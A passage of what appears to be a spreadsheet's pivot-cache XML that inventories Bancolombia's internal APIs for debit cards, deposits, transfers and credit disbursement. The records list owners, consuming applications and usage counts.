    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="24"/>
    <n v="32"/>
    <n v="27"/>
    <n v="25"/>
    <n v="89"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-23T15:01:36"/>
    <s v="CustomerValidation"/>
    <n v="100"/>
    <s v="Customer-Validation-ControlList"/>
    <n v="100"/>
    <s v="customer-validation-control-list"/>
    <s v="API que permite listar los detalles de un cliente en Listas de Control."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="MUVERANG_NU0063001 _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="3297"/>
    <n v="4087"/>
    <n v="3192"/>
    <n v="3032"/>
    <n v="4527"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Administration"/>
    <n v="109"/>
    <s v="debit-card-administration"/>
    <s v="Esta API permite exponer las diferentes de gestión relativas a productos débito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación: - Validar titularidad  - Asociar medio de pago a cuenta  - Bloquear tarjeta  - Desbloquear tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="NovedadesTarjetasDebito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="2979"/>
    <n v="2784"/>
    <n v="2427"/>
    <n v="2131"/>
    <n v="2366"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-24T17:06:33"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Debit Cards"/>
    <n v="118"/>
    <s v="debit-card-debit-cards"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito.   - Listar las tarjetas activas de un cliente - Listar las tarjetas pendientes por activar - Listar las tarjetas canceladas - Consultar codigo de seguridad"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="2988425"/>
    <n v="2847085"/>
    <n v="2758550"/>
    <n v="2702883"/>
    <n v="3044197"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-29T18:01:42"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Information"/>
    <n v="109"/>
    <s v="debit-card-information"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="110726"/>
    <n v="123853"/>
    <n v="102481"/>
    <n v="115036"/>
    <n v="122307"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-25T17:32:49"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Management"/>
    <n v="1012"/>
    <s v="debit-card-management"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de débito. Incluye capacidades de novedades y validacionees."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="GestionTarjetasCredito/V2.0_x000a_GestionTarjetasDebito/V2.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="12165"/>
    <n v="13378"/>
    <n v="18385"/>
    <n v="17411"/>
    <n v="21476"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card Cost"/>
    <n v="103"/>
    <s v="debit-card-cost"/>
    <s v="La Api Debit Card Cost - permite llevar a cabo las siguientes funcionalidades.   - API que permite consultar los costos de la couta de manejo de una tarjeta débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="812"/>
    <n v="5734"/>
    <n v="1540"/>
    <n v="2081"/>
    <n v="15679"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-02T16:46:06"/>
    <s v="Debit Card Design"/>
    <n v="101"/>
    <s v="Debit Card Design - Fares"/>
    <n v="101"/>
    <s v="debit-card-design-fares"/>
    <s v="Esta api cuenta con la capacidad de exponer datos de consulta relacionados con la cuota de manejo y tarifas asociadas a la Tarjeta débito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="ConsultaDeTarifasTarjetasDebito/V1.0"/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="257824"/>
    <n v="232178"/>
    <n v="197494"/>
    <n v="155211"/>
    <n v="158834"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Cards - Delivery"/>
    <n v="105"/>
    <s v="debit-card-delivery"/>
    <s v="La Api Debit Cards - Delivery - permite llevar a cabo las siguientes funcionalidades.   - Api que permite al cliente ingresar su información de contactabilidad, para que le sea entregado un medio de pago en su domicilio por medio de un operador logí­stico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="24196"/>
    <n v="22051"/>
    <n v="22952"/>
    <n v="19328"/>
    <n v="22712"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-08T08:28:36"/>
    <s v="Debit Cards"/>
    <n v="102"/>
    <s v="Debit Cards - Notify"/>
    <n v="102"/>
    <s v="debit-cards-notify"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades: - Informe de Entrega, Permite al proveedor informar el estado final de la entrega de las tarjetas debito en el domicilio de los clientes."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="NotificacionEntregaProductoDebito/V1.0"/>
    <m/>
    <s v="Domina _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="31557"/>
    <n v="379090"/>
    <n v="220842"/>
    <n v="676274"/>
    <n v="710873"/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Information"/>
    <n v="110"/>
    <s v="deposit-account-information"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="4113"/>
    <n v="2526"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Information"/>
    <n v="120"/>
    <s v="deposit-account-information"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="31036"/>
    <n v="31787"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Information"/>
    <n v="200"/>
    <s v="deposit-account-information"/>
    <s v="Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Transactions"/>
    <n v="110"/>
    <s v="deposit-account-transactions"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Transactions"/>
    <n v="201"/>
    <s v="deposit-account-transactions"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3051"/>
    <n v="405"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Transactions"/>
    <n v="310"/>
    <s v="deposit-account-transactions"/>
    <s v="Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasDepositos/V2.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Account Transfers"/>
    <n v="110"/>
    <s v="deposit-account-transfers"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Account Transfers"/>
    <n v="211"/>
    <s v="deposit-account-transfers"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="445"/>
    <n v="515"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-06-02T21:07:31"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Account Transfers"/>
    <n v="220"/>
    <s v="deposit-account-transfers"/>
    <s v="Permite realizar transferencias internas y externas de cuentas depósito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="TransferenciasDeFondos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Fixed Information"/>
    <n v="110"/>
    <s v="deposit-fixed-information"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="2358"/>
    <n v="953"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Fixed Information"/>
    <n v="120"/>
    <s v="deposit-fixed-information"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T22:08:36"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Fixed Information"/>
    <n v="200"/>
    <s v="deposit-fixed-information"/>
    <s v="Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="110"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <s v="deposit-fixed-transactions"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="231"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <s v="deposit-fixed-transactions"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-11T14:19:21"/>
    <s v="Deposits"/>
    <n v="310"/>
    <s v="Deposit - Fixed Transactions"/>
    <n v="110"/>
    <s v="deposit-fixed-transactions"/>
    <s v="Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionCuentasPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-01T16:26:15"/>
    <s v="Deposit Account"/>
    <n v="103"/>
    <s v="Deposit Account - Transfers"/>
    <n v="103"/>
    <s v="deposit-account-transfers"/>
    <s v="El API  permitirá realizar las operaciones de transacciones monetarias de las Cuentas de Ahorro/Corrientes de un cliente Bancolombia y cuenta con las siguientes operaciones: -_x0009_acreditarCuenta -_x0009_debitarCuenta -_x0009_anularCredito -_x0009_anular Débito -_x0009_transferirFondosEntreCuentas -_x0009_anularTransferenciaFondosEntreCuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="AfectacionMonetariaDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="Recargas_AW1300001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ CDT_AW1078001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="735631"/>
    <n v="669335"/>
    <n v="665532"/>
    <n v="594540"/>
    <n v="744336"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-12-15T14:46:45"/>
    <s v="Deposit File Processing"/>
    <n v="102"/>
    <s v="Deposit File Processing - Notification"/>
    <n v="102"/>
    <s v="deposit-file-processing-notification"/>
    <s v="Esta API permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar, realizando la notificación a una aplicación que se le ha dejado un archivo de lotes en una ruta especificada, con el fin de que la aplicación lo tome y lo procese."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ProcesamientoArchivosDepositos/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="901"/>
    <n v="815"/>
    <n v="721"/>
    <n v="703"/>
    <n v="3070"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-12-15T14:46:45"/>
    <s v="Deposit File Processing"/>
    <n v="102"/>
    <s v="Deposit Files Processing - Permission"/>
    <n v="102"/>
    <s v="deposit-file-processing-permission"/>
    <s v="Esta API permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Transversales iSeries"/>
    <s v="Transversal I-Series y No I-Series"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="SolicitudDeAutorizacion/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="901"/>
    <n v="810"/>
    <n v="724"/>
    <n v="720"/>
    <n v="3027"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-23T14:55:54"/>
    <s v="Deposits Design"/>
    <n v="131"/>
    <s v="Deposits Design - Catalogs"/>
    <n v="132"/>
    <s v="deposits-design-catalogs"/>
    <s v="habilita la consulta de los catálogos pertenecientes a depósitos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCatalogosDepositos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="2987"/>
    <n v="2788"/>
    <n v="2427"/>
    <n v="2126"/>
    <n v="2389"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="capacidad que permiten la creación de obligaciones crediticias y diversas formas de disponibilidad de sus recursos."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito A La Mano"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar la creación de la obligación en el sistema Bankvision e inmediatamente después acreditar la cuenta del cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="ELIBOM _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW0856"/>
    <m/>
